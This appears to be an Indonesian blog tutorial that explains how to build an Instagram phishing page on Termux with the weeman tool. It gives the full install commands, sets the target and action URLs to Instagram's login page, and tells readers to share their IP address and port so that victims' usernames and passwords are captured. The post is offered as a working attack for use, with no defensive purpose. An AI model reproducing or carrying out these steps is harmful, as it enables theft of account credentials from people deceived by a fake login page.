-->

Cara Phising Instagram Lewat Termux

Cara Phising Instagram Lewat Termux

Cara Phising Instagram di Termux - di postingan sebelumnya saya sudah pernah membuat tutorial
cara membuat phising fb lewat termux menggunakan tool phising weeman, nah di postingan kali ini
saya akan memberikan tutorial yang hampir sama yaitu meembuat web phising menggunakan termux tetapi bukan phising faebook lagi melainkan phising instagram. sebelum kita lanjut ke tutorialnya kalian pasti sudah tahu kan apa itu phising? jika ada yang belum tahu saya kasih sedikit pengertian tentang phising.

Phishing adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi peka, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang tepercaya dalam sebuah komunikasi elektronik resmi, seperti surat elektronik atau pesan instan. Istilah phishing dalam bahasa Inggris berasal dari kata fishing ('memancing'), dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna. - wikipedia

di sini kita akan menggunakan tool phising yang sama yaitu menggunakan tool weeman. sebenarnya ada tool phising yang lain yang bisa di gunakan untuk membuat web phising tanpa cpanel seperti shell phis dan sociaphis tetapi saya lebih suka menggunakan weeman karena script ini bisa mengubah halaman web apapun menjadi web phising, jadi bukan cuma web social media saja melainkan web game dan dan jual beli pun bisa di jadikan phising.

sebelum kalian masuk ke tahap pembuatanya kita harus menginstall tool weeman dulu di aplikasi termux kita, buat yang belum menginstall berikut tahapan perintah cara menginstall weeman.

Cara Menginstall Weeman di Termux


$apt update && apt upgrade
$pkg install python2
$pkg install git
$git clone https://github.com/evait-security/weeman.git
$cd weeman
$Chmod +x weeman.py
$python2 weeman.py

setalah kalian selesai menginstalllnya sekarang kita masuk ke praktek pembuatan phisingnya

Cara membuat phising instagram di Termux


1. pertama set url loginya sesuai halaman web yang ingin kita buat phising, karena kita akan membuat phising instagram maka set urlnya sebagai berikut

$set url https://www.instagram.com/accounts/login/

2. kemudian atur portnya terserah kalian mau menggunakan port yang mana yang penting tidak bertabrakan dengan port yang lainya misal port 8080

$set port 8080

3. lalu atur action_url nya sesuai url yang sebelumnya kalian masukan

$set action_url https://www.instagram.com/accounts/login/

4. untuk menjalankanya ketikan perintah run

$run

biarkan proses berjalan nanti jika ada result maka akan tampil di sana

cara phising instagram di termux

untuk mengakses web phising yang telah kita buat kita harus mengecek ip adress kita terlebih dahulu,
kalian bisa gunakan termux untuk melihat ip address kalian dengan cara "new sesion" atau buka tab baru pada termux agar proses weeman tidak terganggu, kemudian ketikan "ifconfig" cari bagian "inet addr" maka di situlah ip address kalian.

setelah itu tambahkan ip address berserta port yang kalian setting di weeman misal 10.201.32.21:8080 lalu letakan pada address bar browser.

cara membuat web phising menggunakan termux

jika ada orang yang mengaksesenya maka akan tertera informasi akun pada weeman yang kalian jalankan. demikian cara membuat phising instagram di termux semoga bermanfaat dan samppai jumpa di postingan berikutnya.

Related Posts

1 comment

  1. eror bang knpa ya , kok gk bisa instal ssh ny

    ReplyDelete

Post a Comment

Subscribe Our Newsletter